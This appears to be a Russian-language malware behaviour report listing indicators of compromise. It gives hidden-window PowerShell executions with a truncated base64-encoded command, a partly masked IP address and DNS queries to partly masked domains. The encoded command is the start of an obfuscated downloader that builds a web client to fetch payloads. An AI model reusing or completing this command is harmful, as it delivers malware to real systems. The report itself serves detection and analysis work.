Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAF8ANQA3AF8AXwA4AD0AKAAnAFAAMgAwACcAKwAnADUANgAyACcAKQA7ACQAVgA0ADgANQBfAF8AMAAyAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEsAMQA0AF8ANAA3AD0AKAAnAGgAdAB0AH...
- '35.##0.146.198':80
- DNS ASK au####rg-auto.com
- DNS ASK rk####mbing.co.uk
- DNS ASK vi##to.pro
- DNS ASK sa###a.trade
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEAF8ANQA3AF8AXwA4AD0AKAAnAFAAMgAwACcAKwAnADUANgAyACcAKQA7ACQAVgA0ADgANQBfAF8AMAAyAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAEsAMQA0AF8ANAA3AD0AKAAnAGgAdAB0AH...' (со скрытым окном)